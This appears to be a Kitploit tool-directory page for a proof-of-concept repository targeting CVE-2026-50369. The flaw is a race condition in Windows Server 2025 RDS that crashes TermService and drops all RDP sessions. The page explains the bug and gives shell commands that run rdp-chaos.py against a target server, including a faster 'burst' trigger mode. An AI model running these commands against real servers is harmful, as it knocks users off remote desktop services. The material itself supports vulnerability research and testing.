Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-50369 — Proof-of-concept exploit for CVE-2026-50369, demonstrating the vulnerability and providing a working exploit for security testing and verification. | Kitploit
Outils/GitHubGitHub/syxlox/cve-2026-50369
Vulnerability AnalysisExploitationPenetration Testing
GitHubsyxlox/cve-2026-50369

CVE-2026-50369

Proof-of-concept exploit for CVE-2026-50369, demonstrating the vulnerability and providing a working exploit for security testing and verification.

Voir le dépôt
23il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Contenu non disponible dans la langue demandée. Affichage de la version anglaise.

CVE-2026-50369

reproducer for a TOCTOU race condition in rdpcorets.dll!CRdpPipeGfxPlugin::Enable on Windows Server 2025 RDS Session Hosts.

i reported this as a DoS; the code-path seem to somehow also enable EoP. this reproducer is a PoC for the DoS path alone.

Bug

Enable reads a COM interface pointer at this+0x60 twice without synchronization. TerminateInstance clears the same field outside its own critical section scope. Both execute concurrently on the NT threadpool via PnP device arrival and removal work items. The second read dereferences null → access violation → TermService crash → all active RDP sessions disconnected.

root@kitploit:~
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3  # or freerdp2-x11

# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt

# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt

# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
    --burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030
Télécharger l’outil